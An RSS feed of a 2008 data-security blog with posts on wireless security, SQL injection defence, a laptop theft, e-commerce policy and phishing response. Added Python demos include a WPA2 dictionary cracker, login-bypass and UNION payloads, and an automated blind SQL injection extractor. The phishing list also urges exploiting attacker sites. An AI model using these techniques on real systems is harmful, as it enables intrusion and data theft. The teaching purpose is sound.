<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>DataSecurityPolicies.com &#187; Security Standards</title>
	<atom:link href="http://www.datasecuritypolicies.com/category/security-standards/feed" rel="self" type="application/rss+xml" />
	<link>http://www.datasecuritypolicies.com</link>
	<description></description>
	<lastBuildDate>Fri, 07 Nov 2008 03:21:37 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>6 Tips For Improving Wireless Network Security</title>
		<link>http://www.datasecuritypolicies.com/6-tips-for-improving-wireless-network-security</link>
		<comments>http://www.datasecuritypolicies.com/6-tips-for-improving-wireless-network-security#comments</comments>
		<pubDate>Sun, 26 Oct 2008 02:03:59 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Wireless Security Standard]]></category>
		<category><![CDATA[WEP Security]]></category>
		<category><![CDATA[Wireless Security]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/?p=103</guid>
		<description><![CDATA[By Andrew Winthorp  With many individuals and businesses connecting to the internet using wireless devices, and the reported cases of security breach and identity theft, having an awareness of wireless security measures to improve system security is a must. Many wireless users simply do not know that they are open and exposed to system penetration [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-120" style="border: white 7px solid;" title="wep" src="http://www.datasecuritypolicies.com/wp-content/uploads/2008/10/wep.jpg" alt="" width="336" height="223" />By <a href="http://ezinearticles.com/?expert=Andrew_Winthorp">Andrew Winthorp</a> </p>
<p>With many individuals and businesses connecting to the internet using wireless devices, and the reported cases of security breach and identity theft, having an awareness of wireless security measures to improve system security is a must. Many wireless users simply do not know that they are open and exposed to system penetration and bandwidth theft. Here are several suggestions to prevent your system from becoming a wireless hotspot.</p>
<p>(i) Change the password on your router. Every router ships with a default administrator password and a default network name (SSID), and the defaults for each model are publicly listed, so attackers know them. Change the administrative password to something<span id="more-103"></span> that is difficult to guess; do not pick something as simple as myrouter. Rotating the password periodically is an extra precaution.</p>
<p>(ii) Enable encryption. Follow the encryption setup procedure provided with your router. WEP and WPA2 are the two options most routers offer; choose WPA2 (with AES/CCMP), the current standard. WEP is broken: its RC4 keys can be recovered from a few minutes of captured traffic with freely available tools, so a WEP network should be treated as no better than an open one. WPA2 encrypts traffic so that unauthorized third parties cannot make use of it, throwing a spanner in the works for packet sniffers looking to harvest sensitive details.</p>
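<p>As an added example (not part of Andrew Winthorp&#8217;s article), the Python below shows what tips (i) and (ii) actually protect. WPA2-Personal derives its 256-bit Pairwise Master Key (PMK) from the passphrase and the SSID with PBKDF2-HMAC-SHA1, 4096 iterations, SSID as the only salt; anyone who captures a single four-way handshake can run that same derivation offline against a wordlist. The SSID &#8220;linksys&#8221;, the passphrase &#8220;myrouter&#8221; and the wordlist are constructed for the demonstration.</p>

```python
import hashlib
import hmac
from typing import Iterable, Optional

# WPA2-Personal (IEEE 802.11i) PMK derivation:
#   PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, iterations=4096, 32 bytes)
# This is what wpa_passphrase and every WPA2 router compute. The standard's
# published test vector is passphrase "password", SSID "IEEE" ->
# f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e.

PASSPHRASE_MIN, PASSPHRASE_MAX = 8, 63  # length limits from the standard


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the PMK for a network; rejects passphrases the standard forbids."""
    if not PASSPHRASE_MIN <= len(passphrase) <= PASSPHRASE_MAX:
        raise ValueError("WPA2 passphrase must be 8 to 63 characters")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA2 passphrase must be printable ASCII")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, dklen=32
    )


def recover_passphrase(target_pmk: bytes, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack against a captured network.

    Simplification: a real cracker checks each guess against the MIC in the
    captured four-way handshake rather than against the PMK itself, but the
    cost per guess (one PBKDF2 run) and the outcome are identical.
    """
    for guess in wordlist:
        try:
            candidate = wpa2_pmk(guess, ssid)
        except ValueError:
            continue  # not a legal WPA2 passphrase, no router would accept it
        if hmac.compare_digest(candidate, target_pmk):
            return guess
    return None


if __name__ == "__main__":
    # Constructed example network: "linksys" is a well-known default SSID.
    pmk = wpa2_pmk("myrouter", "linksys")
    print(pmk.hex())
    # Constructed wordlist; the weak passphrase falls on the third guess.
    print(recover_passphrase(pmk, "linksys", ["admin", "password", "myrouter"]))
```

<p>Two things follow from the derivation. The SSID is the salt, so a default SSID such as &#8220;linksys&#8221; lets precomputed tables be reused against every network that kept it; changing the SSID along with the password (tip i) defeats that. And because the attacker&#8217;s cost per guess is one PBKDF2 run, a passphrase that appears in any wordlist offers no protection at all, no matter how strong the WPA2 cipher is.</p>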
<p>(iii) Keep a close check on remote access points. Companies that expose web interfaces or remote administration should establish security procedures for them: restrict the management interface to the wired side of the network, disable administration from the internet unless it is genuinely needed, and change the access passwords regularly.</p>
<p>(iv) Avoid using unsecured wireless hotspots in public locations. Malicious third parties frequently set up rogue access points that route your traffic through equipment built to inspect it and capture sensitive details.</p>
<p>(v) Always wipe all hardware that is sold or disposed of, routers included. This eliminates the chance that a third party can recover sensitive data, stored keys or passwords that could be used for identity theft, financial crime or access to corporate systems.</p>
<p>(vi) Use wireless security software. Whether you&#8217;re an individual or a corporation, such software has benefits. A program such as McAfee Wireless Home Network Security rotates the encryption key automatically every three hours. It also locks down the router configuration and provides event logging and alerting so that devices attempting to gain access can be reviewed. Institutions should consider more advanced tools such as ManageEngine WiFi Manager.</p>
<p>Taking the time to plan and implement security measures before putting a wireless network into use is the best way to protect yourself. A little extra time during setup is time well spent.</p>
<p>Andrew Winthorp owns and operates <a href="http://www.wireless-network-tutorials.com/" target="_new">http://www.wireless-network-tutorials.com</a> <a href="http://www.wireless-network-tutorials.com/" target="_new">Wireless Network Tutorials</a> &#8211; Learn more about key aspects of wireless setup and security.</p>
<p>Article Source: <a href="http://ezinearticles.com/?expert=Andrew_Winthorp">http://EzineArticles.com/?expert=Andrew_Winthorp</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/6-tips-for-improving-wireless-network-security/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hardening Your Web Application Against SQL Injections</title>
		<link>http://www.datasecuritypolicies.com/hardening-your-web-application-against-sql-injections</link>
		<comments>http://www.datasecuritypolicies.com/hardening-your-web-application-against-sql-injections#comments</comments>
		<pubDate>Thu, 16 Oct 2008 04:56:31 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Security Policies]]></category>
		<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Vulnerability Management Policy]]></category>
		<category><![CDATA[Application Hardening]]></category>
		<category><![CDATA[Server Hardening]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Web Application]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/?p=101</guid>
		<description><![CDATA[By Raheel Ahmad WARNING: The information provided is for educational purposes only and is not to be used maliciously. Before digging into what SQL injection actually is, let me explain what SQL itself is. What is SQL? Structured Query Language (SQL) is a specialized language for sending queries to databases. Most small [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-105" style="border: white 7px solid;" title="sql-injection" src="http://www.datasecuritypolicies.com/wp-content/uploads/2008/10/sql-injection.jpg" alt="" width="275" height="133" />By <a href="http://ezinearticles.com/?expert=Raheel_Ahmad">Raheel Ahmad</a></p>
<p><strong>WARNING:</strong></p>
<p>The information provided is for educational purposes only and is not to be used maliciously.</p>
<p>Before digging into what SQL injection actually is, let me explain what SQL itself is.</p>
<p><strong>What is SQL?</strong></p>
<p>Structured Query Language (SQL) is a specialized language for sending queries to databases. Most small and industrial-strength database applications can be accessed using SQL statements. SQL is both an ANSI and an ISO standard; however, many database products that support SQL do so with proprietary extensions to the standard language. Web applications often build SQL statements from user-supplied input when serving dynamic page requests, and that is where the trouble begins.</p>
<p><strong>What is SQL Injection?</strong></p>
<p>SQL injection is a technique that exploits a <span id="more-101"></span>security vulnerability occurring in the database layer of a web application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.</p>
<p>&#8220;SQL injection&#8221; is a subset of the unverified/unsanitized user input class of vulnerability (&#8220;buffer overflows&#8221; are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application builds SQL strings naively on the fly and then runs them, it is straightforward to create some real surprises.</p>
<p>Many organizations&#8217; web servers have been compromised purely through SQL injection, including big names that I would rather not mention here; they are easy to find on the internet.</p>
<p><strong>What is Blind SQL Injection?</strong></p>
<p>This particular type of attack is called blind SQL injection because the attacker cannot take advantage of detailed error messages from the server, or of other sources of information about the application. Getting the SQL syntax right is usually the trickiest part of the blind SQL injection process and may require a lot of trial and error. But by appending conditions to the SQL statement and observing how the web application&#8217;s output changes (a page that renders one way when the condition is true and another way when it is false), an attacker will eventually determine whether the application is vulnerable, and can then pull data out of the database one true/false answer at a time.</p>
<p>Blind SQL injection is a special case that plays on the web developer&#8217;s or website owner&#8217;s sense of security. While they may think that everything on the server is tightly guarded, a blind SQL injection attack will silently be playing truth or consequences with the database server. Though very time consuming, this type of attack provides one of the most damaging security holes, because the attacker gains not only access but an enormous amount of knowledge about the database, and can potentially reach the server&#8217;s file system through database features that read or write files. The attack is normally automated and requires a good amount of setup to succeed, but once it is working it does not require a great deal of effort to repeat.</p>
<p><strong>What is Error message SQL Injection?</strong></p>
<p>Web applications commonly use SQL queries with client-supplied input in the WHERE clause to retrieve data from a database. When a web application executes such queries without validating the user-supplied data, a SQL injection attack can occur. By sending unexpected data, an attacker controls the SQL queries the web application submits to its database. A test for SQL injection takes place by sending the application data that generates an invalid SQL query, typically a lone single quote. If the server returns the database error message, the information in it (the query structure, table and column names, the database product) can be used to work towards uncontrolled access to the database. This is the basis of one of the most popular SQL injection attacks.</p>
<p>Hiding error messages does not stop SQL injection. What typically happens is that the attacker uses the knowledge gained from the failed attempt to change tactics, and turns to blind SQL injection.</p>
<p><strong>Why SQL Injection?</strong></p>
<p>When a web application fails to properly sanitize user-supplied input, an attacker can alter the construction of back-end SQL statements. A modified statement runs with the same permissions as the component that executed it, that is, the database account the application logs in with. The impact therefore ranges from reading or changing any data that account can reach, to total control of the database, to executing commands on the database host where the account has the privileges to do so.</p>
<p>When a machine has only port 80 open, your most trusted vulnerability scanner returns nothing useful, and you know the administrator always patches the server, this is the point where a malicious hacker turns to web hacking. SQL injection is a type of web attack that requires nothing but port 80, and it may work even when the administrator is patch-happy, because it attacks the web application itself (ASP, JSP, PHP, CGI and so on) rather than the web server or the services running on the OS.</p>
<p><strong>Types of SQL Injections:</strong></p>
<p>There are four main categories of SQL injection attacks against the database layer of a web application:</p>
<p>1. SQL manipulation: modifying the SQL statement, for example with set operations such as UNION, or by changing the WHERE clause so that the query returns different rows than intended.</p>
<p>2. Code injection: inserting new SQL statements or database commands into the vulnerable statement. One such attack appends a SQL Server EXECUTE command to the vulnerable statement. This type of attack is only possible when the database interface supports multiple SQL statements per request.</p>
<p>3. Function call injection: inserting database function calls into the vulnerable statement. These function calls may make operating system calls or manipulate data in the database.</p>
<p>4. Buffer overflows: overflows in database functions, triggered through function call injection. Patches are available for most commercial and open-source databases, so this type of attack succeeds only against servers that are unpatched.</p>
<p><strong>SQL Injection Prevention Techniques:</strong></p>
<p>Mitigating a SQL injection vulnerability means taking one of two paths: either stored procedures invoked through callable statements, or prepared statements for dynamic SQL commands. Whichever path is adopted, data validation is a must.</p>
<p>a. Input validation</p>
<p>Data validation is key. The best approach is default deny: write specific allow-list filters (regular expressions) that accept only the characters each field actually needs, ideally just letters and digits. For instance, if the user is submitting an e-mail address, allow only letters, digits, @, -, . and _. If punctuation marks must be accepted, remember that HTML-encoding them (so that a double quote becomes &amp;quot; or &gt; becomes &amp;gt;) protects the browser against cross-site scripting when the value is displayed; it does not make the value safe to concatenate into a SQL statement. Validation is a supplement to the bind-variable techniques below, not a replacement for them.</p>
<p>b. Use of prepared statement</p>
<p>Prepared statements should be used whenever stored procedures cannot be used, for whatever reason, and dynamic SQL commands are required.</p>
<p>Use a prepared statement to send a precompiled SQL statement with one or more parameters. Parameter placeholders in a prepared statement are represented by ? and are called bind variables. Prepared statements are generally immune to SQL injection because the database uses the value of the bind variable exclusively as data and never interprets its contents as part of the statement. PL/SQL and JDBC allow for prepared statements, as do practically all other database interfaces. Prepared statements should be used extensively, for both security and performance reasons. Their one limitation is that only values can be bound: table names, column names and keywords such as the ORDER BY direction cannot be parameters, so those must be chosen from a fixed list in code rather than taken from the request.</p>
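<p>The following Python example is added to this article (it is not the author&#8217;s code) and ties together the SQL manipulation category above, the blind injection technique described earlier and the bind-variable fix. It runs against a constructed in-memory SQLite table whose users and passwords are invented for the demonstration: <code>login_vulnerable</code> concatenates input into the statement, <code>login_safe</code> binds it, and <code>blind_extract</code> shows how a yes/no answer from the vulnerable version is enough to recover a column value character by character, while the same payloads sent to the safe version are treated as ordinary strings.</p>

```python
import sqlite3
from typing import Callable, List

# Constructed in-memory database; the table, users and passwords are invented
# for this demonstration and are not taken from the article.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Builds the statement by string concatenation: input becomes SQL syntax."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Prepared statement: the ? placeholders are bind variables, sent as data only."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def make_oracle(conn: sqlite3.Connection, login: Callable[..., List[str]]) -> Callable[[str], bool]:
    """Turn a login function into a yes/no oracle for blind injection.

    The condition is injected into the username and the trailing comment
    discards the password clause. With the vulnerable login the oracle
    answers truthfully; with the safe login it is always False because no
    user is literally named "alice' AND (...) -- ".
    """
    def oracle(condition: str) -> bool:
        rows = login(conn, "alice' AND (" + condition + ") -- ", "irrelevant")
        return len(rows) > 0
    return oracle


def blind_search(oracle: Callable[[str], bool], expr: str, lo: int = 0, hi: int = 127) -> int:
    """Binary search for the integer value of SQL expression `expr` in [lo, hi].

    Each probe is one HTTP request in a real attack, so a 7-bit character
    costs about seven page loads instead of up to 95 guesses.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("(" + expr + ") > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time."""
    length = blind_search(oracle, "length((" + subquery + "))", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = blind_search(oracle, "unicode(substr((" + subquery + "), " + str(i) + ", 1))")
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    # 1. SQL manipulation: a tautology in the WHERE clause, then a UNION that
    #    reads another column straight into the login result.
    print(login_vulnerable(db, "' OR '1'='1", "' OR '1'='1"))
    print(login_vulnerable(db, "x' UNION SELECT password FROM users -- ", ""))
    # 2. Blind injection: nothing is displayed except "logged in" or not.
    secret = "SELECT password FROM users WHERE username = 'alice'"
    print(blind_extract(make_oracle(db, login_vulnerable), secret))
    # 3. The parameterized version treats the same payloads as literal strings.
    print(login_safe(db, "' OR '1'='1", "' OR '1'='1"))
    print(blind_extract(make_oracle(db, login_safe), secret))
```

<p>Note that the safe version rejects the payloads not because anything filtered them but because the driver sends the values separately from the statement text, so the quotes, UNION and comment marker are compared against the username column as characters. That is the whole difference between the two functions, and it is why bind variables are the primary defence and input validation the supplement.</p>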
<p>c. Use minimum privileges</p>
<p>Make sure that the application&#8217;s database user has the bare minimum rights on the database server. If the application connects to the database as root, sa, dbadmin or dbo, reconsider whether it really needs such a high level of privilege or whether it can be reduced. Do not give the application user permission to run system stored procedures; allow access only to the user-created ones it needs.</p>
<p>d. Stored procedures</p>
<p>To secure an application against SQL injection, developers must never allow client-supplied data to modify the syntax of SQL statements. One way to achieve this is to isolate the web application from SQL altogether: keep all SQL statements the application requires in stored procedures on the database server, and have the application execute them through a safe interface such as the CallableStatement of JDBC or the Command object of ADO. A stored procedure only helps, however, if it does not itself assemble dynamic SQL from its arguments (for example by executing a concatenated string); such a procedure is just as injectable as the application code it replaced.</p>
<p>And many more &#8230;.</p>
<p>article by Raheel Ahmad, CISSP</p>
<p>Article Source: <a href="http://ezinearticles.com/?expert=Raheel_Ahmad">http://EzineArticles.com/?expert=Raheel_Ahmad</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/hardening-your-web-application-against-sql-injections/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Deloitte Laptop Stolen</title>
		<link>http://www.datasecuritypolicies.com/deloitte-laptop-stolen</link>
		<comments>http://www.datasecuritypolicies.com/deloitte-laptop-stolen#comments</comments>
		<pubDate>Fri, 10 Oct 2008 18:48:10 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Data Security Policy]]></category>
		<category><![CDATA[Security Policies]]></category>
		<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Deloitte Stolen Laptop]]></category>
		<category><![CDATA[Laptop Encryption]]></category>
		<category><![CDATA[Laptop Encryption Policy]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/?p=76</guid>
		<description><![CDATA[In a breaking news story directly related to data security policies, it sounds like Deloitte had another laptop stolen yesterday, 9 Oct 2008. Here&#8217;s an excerpt from the UK Computing article here: A laptop owned by consultancy Deloitte which held information about staff under BSkyB’s pension plan has been stolen, Computing can reveal. The computer [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-medium wp-image-77" style="border: white 7px solid;" title="deloitte-laptop-stolen" src="http://www.datasecuritypolicies.com/wp-content/uploads/2008/10/deloitte-laptop-stolen-300x224.jpg" alt="" width="300" height="224" />In a breaking news story directly related to data security policies, it sounds like Deloitte had another laptop stolen yesterday, 9 Oct 2008.</p>
<p>Here&#8217;s an excerpt from the UK Computing article <a href="http://www.computing.co.uk/computing/news/2227846/bskyb-employee-stolen" target="_blank">here</a>:</p>
<blockquote><p>A laptop owned by consultancy Deloitte which held information about staff under BSkyB’s pension plan has been stolen, <em>Computing</em> can reveal.</p>
<p>The computer was taken from a Deloitte employee in September at a public place and contained names, dates of birth and salary figures to be used for audit work on the broadcaster’s pension scheme.</p>
<p>BSkyB said the data did not include bank or address details and claimed it is highly unlikely that the information will be mishandled due to the laptop’s reliable data security set-up.</p>
<p>“The laptop was protected by a number of security measures, including passwords, user IDs and encryption of the majority of the information, so we are confident that the risk of data access or misuse is low,” said a BSkyB spokeswoman.</p></blockquote>
<p>The fact that the spokeswoman says they used encryption on &#8220;the majority of the information&#8221; signals to me that they weren&#8217;t using whole disk encryption which is a common practice on laptops these days.</p>
<p>I&#8217;m sure if they were using full disk encryption they would have been 100% confident that the data was protected and they wouldn&#8217;t have had to notify the media about the loss.</p>
<p>What do you think?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/deloitte-laptop-stolen/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Data Security Policy For ECommerce Merchants</title>
		<link>http://www.datasecuritypolicies.com/data-security-policy-for-ecommerce-merchants</link>
		<comments>http://www.datasecuritypolicies.com/data-security-policy-for-ecommerce-merchants#comments</comments>
		<pubDate>Tue, 10 Jun 2008 04:17:38 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Security Policies]]></category>
		<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Data Security Policies]]></category>
		<category><![CDATA[Ecommerce Security]]></category>
		<category><![CDATA[Security Policy]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/?p=66</guid>
		<description><![CDATA[By Joe Cole Combating fraudulent transactions starts with creating and implementing your organization&#8217;s data security policy. Consumers expect that eCommerce merchants protect the personal payment information they provide during a transaction and that it will only be used for completing the transaction. They also expect that merchants explain the measures and procedures they have set [...]]]></description>
			<content:encoded><![CDATA[<div id="body">
<p><img class="alignleft size-full wp-image-67" style="border: white 7px solid;" title="ecommerce_security" src="http://www.datasecuritypolicies.com/wp-content/uploads/2008/10/ecommerce_security.jpg" alt="" width="230" height="150" />By <a id="link_46" href="http://ezinearticles.com/?expert=Joe_Cole">Joe Cole</a></p>
<p>Combating fraudulent transactions starts with creating and implementing your organization&#8217;s data security policy. Consumers expect that eCommerce merchants protect the personal payment information they provide during a transaction and that it will only be used for completing the transaction. They also expect merchants to explain the measures and procedures they have put in place to keep sensitive account data safe. To address your customers&#8217; expectations and to prevent fraudulent activity, eCommerce merchants should<span id="more-66"></span> consider implementing the following best practices regarding information security:</p>
<ul>
<li><strong>Educate Consumers about your Security Practices.</strong> Create a page that details your website&#8217;s security practices and controls. Consider including in it the following:
<ul>
<li>A detailed explanation on how payment information is protected at all stages of the transaction process: during transmission, while on your server and at your physical work site.</li>
<li>Make the page available to all visitors to your website. You should consider placing a link to it in your home page. Placing a link in your header or footer will make the page accessible from any page of your website.</li>
</ul>
</li>
<li><strong>Create a Security Section in your FAQ Page.</strong> If you have not already, you should create a FAQ page and include in it questions and answers on how customers can protect themselves while shopping online.</li>
<li><strong>Add the Logos of Fraud Prevention Services that you are Using.</strong> Place on your website the logos of all fraud prevention and data protection services that you are using.</li>
<li><strong>Warn Customers against Sending Payment Information by Email.</strong> Email is not a secure way to do business; however, some customers are not aware of that. To better protect their personal information you should highlight your security practices on your website and in your email correspondence. Advise customers that:
<ul>
<li>Email is an insecure method of communication and should never be used for transmitting account data or other sensitive information.</li>
<li>Your website uses SSL encryption to protect personal information from unauthorized access while it is in transit, and this is the safest way to submit payment details online.</li>
</ul>
</li>
</ul>
</div>
<p><a href="http://unibulmerchantservices.com/" target="_new">Merchant Services</a></p>
<p><a href="http://www.unibulmerchantservices.com/apply-online/business-merchant-account/" target="_new">Business Merchant Account</a></p>
<p>Article Source: <a id="link_80" href="http://ezinearticles.com/?expert=Joe_Cole">http://EzineArticles.com/?expert=Joe_Cole</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/data-security-policy-for-ecommerce-merchants/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sophisticated Attacks on Community Financial Institutions Increasing!</title>
		<link>http://www.datasecuritypolicies.com/sophisticated-attacks-on-community-financial-institutions-increasing</link>
		<comments>http://www.datasecuritypolicies.com/sophisticated-attacks-on-community-financial-institutions-increasing#comments</comments>
		<pubDate>Sat, 10 May 2008 03:52:11 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Security Policies]]></category>
		<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Data Security Policies]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Security Policy]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/?p=59</guid>
		<description><![CDATA[By Gale Yocom In today&#8217;s high-tech world, maintaining the privacy and protection of customer and employee information grows more and more difficult, particularly for many financial institutions. These days scammers are getting bolder and more brazen in their abilities to get personal information from banking customers as they aggressively target the smaller locally owned [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-medium wp-image-60" style="border: white 7px solid;" title="phishing" src="http://www.datasecuritypolicies.com/wp-content/uploads/2008/10/phishing-300x260.jpg" alt="" width="300" height="260" />By <a href="http://ezinearticles.com/?expert=Gale_Yocom">Gale Yocom</a></p>
<p>In today&#8217;s high-tech world, maintaining the privacy and protection of customer and employee information grows more and more difficult, particularly for financial institutions. These days scammers are getting bolder and more brazen in their attempts to get personal information from banking customers as they aggressively target smaller, locally owned community financial institutions. In fact, a client of ours recently reported a complex, malicious and targeted attack on their institution&#8217;s customers and employees. A well-recognized phishing activity trends website reported that financial institutions saw a continuing rise in phishing activity, with 92.5% of attacks targeting financial institutions. On average, a phishing site stays online for 3.8 days. The relevance of the number of days online is that the longer a site remains up, the more opportunities the scammer has to gather personal information. It is imperative that we <span id="more-59"></span>are prepared for this type of incident and the response that is needed.</p>
<p><strong>Phishing and Pharming Attacks</strong></p>
<p>There was a time when only the larger financial institutions, such as Wells Fargo, were targeted by phishing and pharming scams, but that&#8217;s no longer the case. The increase in phishing attacks on community financial institutions stems from the fact that smaller institutions are simply more profitable targets and are usually less protected against fraudulent activity. As mentioned above, one of our local community financial institutions was hit with a complex and sophisticated vishing/pharming/phishing telephone scam that focused on customers as well as on the bank&#8217;s employees. Fortunately, we have been preparing our client for years for these types of attacks, so they were on the alert and the attack caused minimal disruption. Sharp customers and employees recognized that the email messages were a scam because of their poor grammar and content, and because the salutation was addressed to &#8220;member&#8221; or some other nondescript person rather than to the customer by name. Furthermore, the scam messages did not provide a means for contacting the institution with questions, but instead told customers and employees not to reply; a legitimate institution always gives its customers a way to reach it. But even with preparation, and after years of working in the internet security arena, we were surprised at the combination of attack vectors used.</p>
<p><strong>Combination of Attack Vectors</strong></p>
<p>The scammers used a variety of strategies, starting with a mass email and pharming scam built from a do-it-yourself phishing kit in an attempt to steal personal information. The initial attack was then followed up with telephone calls to certain area codes from spoofed numbers, a technique called vishing. Beyond the pharming, phishing and vishing tactics aimed at stealing credit card numbers, social security numbers, IDs and passwords, the attackers did not stop there: they also used spear phishing, an email-spoofing fraud that targets financial institution employees in an attempt to gain unauthorized access to confidential data. Because of the bank&#8217;s watchful eye, they caught it in time, but these types of attacks are getting bolder and more commonplace and require a great deal more vigilance in keeping personal information away from scammers.</p>
<p><strong>Why Customers Are Fooled</strong></p>
<p>Approximately 19% of recipients respond to spear phishing, which today is one of the most menacing threats to internet users. Unfortunately, users do not clearly understand the importance of checking for authenticity, which should include verifying that the site they are being sent to is the institution&#8217;s real site (the address shown in the browser, not just a padlock icon). As a busy society we are so focused on getting the job done quickly and efficiently that we often don&#8217;t check for important clues, which is why many users receiving messages or paying bills online don&#8217;t watch for the signs that an email message or site is fraudulent.</p>
<p><strong>An Incident Response Plan</strong></p>
<p>As these scams are on the rise, a financial institution that is prepared, and in today&#8217;s world it has to be, will suffer minimal consequences. In the event of a phishing or pharming scam, staff members should know how to deal with the situation effectively. To ensure customers&#8217; safety and privacy, an incident response plan should be in place; examiners require one. The plan should lay out an organized approach to how the problem is going to be handled and who is responsible for each step.</p>
<p>The following should be considered in regard to an Incident Response Plan:</p>
<ul>
<li>Start by assessing the situation so that you know exactly what your bank is dealing with; when an incident has occurred, it is usually up to the CEO and CIO to direct the overall response together with members of a CSIRT.</li>
<li>Fight the attacker.</li>
<li>Educate the end user.</li>
<li>Redirect pharming clicks to an education page (most phishing kits hotlink images from your real site, so image requests that arrive with a foreign Referer can be answered with a warning image instead of the real one).</li>
<li>Attempt to shut down the phishing site yourself.</li>
<li>If needed, have a competent vendor respond to the situation and counter the attack; this also settles who will take down the website and which agencies to contact.</li>
<li>Exploit the phishing website.</li>
<li>Communicate with customers.</li>
<li>Post bulletins on your website to ensure customers are aware of the situation.</li>
<li>Have employees assure customers that security controls are in place at the institution.</li>
<li>Contact authorities such as the Secret Service and FBI; in addition, contact financial service vendors for support on abnormal activity on customer accounts.</li>
<li>Feed bogus information to the pharmed sites.</li>
<li>Review abnormal activity on customer accounts and bogus accounts.</li>
<li>Engage third-party monitoring companies.</li>
</ul>
<p>This is not intended to be a complete incident response plan, but to trigger the thought process on items to be covered.</p>
<p><strong>Preventative Actions</strong></p>
<p>At one time or another your institution will be affected by a fraud scam. The most effective preventive actions are therefore being prepared with a good response plan for employees, providing customer education, and having the resources (either in-house or outsourced) to handle the problem efficiently and effectively. Prevention is primary in keeping phishing and pharming scams at bay, so as a preventive measure, customers who use online banking at any financial institution should be warned to use caution when opening any type of e-mail with links that appear to come from their financial institution. Even if the message looks legitimate, prudence is always best. Educate customers to be proactive rather than reactive. Alert customers not to click any links that come in e-mails, especially if they appear somewhat suspicious. In addition, if the customer has any doubt about an e-mail message, advise the customer to call their financial institution directly to determine whether it could be a phishing or pharming scam.</p>
<p>Provide customers with security awareness training by developing a web page about information disclosure, and set up a closely monitored e-mail address at your institution where customers can report suspicious activity.</p>
<p><strong>About the Author</strong></p>
